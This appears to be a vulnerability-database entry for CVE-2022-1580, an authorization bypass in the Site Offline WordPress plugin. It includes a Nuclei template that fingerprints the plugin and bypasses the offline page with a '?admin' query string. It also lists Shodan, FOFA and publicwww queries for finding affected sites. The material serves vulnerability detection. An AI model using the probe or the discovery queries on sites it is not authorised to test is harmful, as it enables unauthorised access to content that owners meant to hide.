CVE-2022-1580: Site Offline WP Plugin < 1.5.3 - Authorization Bypass

日期: 2025-08-01 | 影响软件: Site Offline WP Plugin | POC: 已公开

漏洞描述

The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.

PoC代码[已公开]

id: CVE-2022-1580

info:
  name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass
  author: s4e-io
  severity: medium
  description: |
    The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.
  remediation: Fixed in 1.5.3
  reference:
    - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1580
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2022-1580
    cwe-id: CWE-639
    epss-score: 0.09479
    epss-percentile: 0.92541
    cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: freehtmldesigns
    product: "site_offline"
    framework: wordpress
    publicwww-query: "/wp-content/plugins/site-offline/"
    shodan-query: http.html:/wp-content/plugins/site-offline/
    fofa-query: body=/wp-content/plugins/site-offline/
  tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt"

    matchers:
      - type: word
        internal: true
        words:
          - "Site Offline Or Coming Soon Or Maintenance Mode"

  - method: GET
    path:
      - "{{BaseURL}}/?admin"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "wp-block", "author")'
          - "status_code == 200"
        condition: and
# digest: 490a004630440220356c33579ab4dc13b84ebd1a80450abbaf969c6ddc8cd8a58eb1752ba236c66f02202c2a265a8c420fcbae536d2a6a7a78cfbcac5d3142f51aab8423f9f8eaf021b0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐